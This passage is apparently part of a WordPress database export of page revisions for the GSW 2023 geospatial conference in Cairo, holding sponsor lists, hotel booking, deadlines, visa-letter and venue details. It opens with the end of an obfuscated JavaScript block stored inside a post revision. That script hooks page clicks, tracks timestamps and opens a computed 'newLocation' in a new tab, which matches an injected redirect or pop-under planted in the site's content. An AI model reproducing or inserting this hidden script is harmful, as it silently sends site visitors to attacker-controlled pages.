Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 22:01:58','2023-06-09 22:01:58','',3066,'https://gsw2023.com/?p=4662',0,'revision','',0),
(4663,1,'2023-06-09 22:02:55','2023-06-09 22:02:55','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p 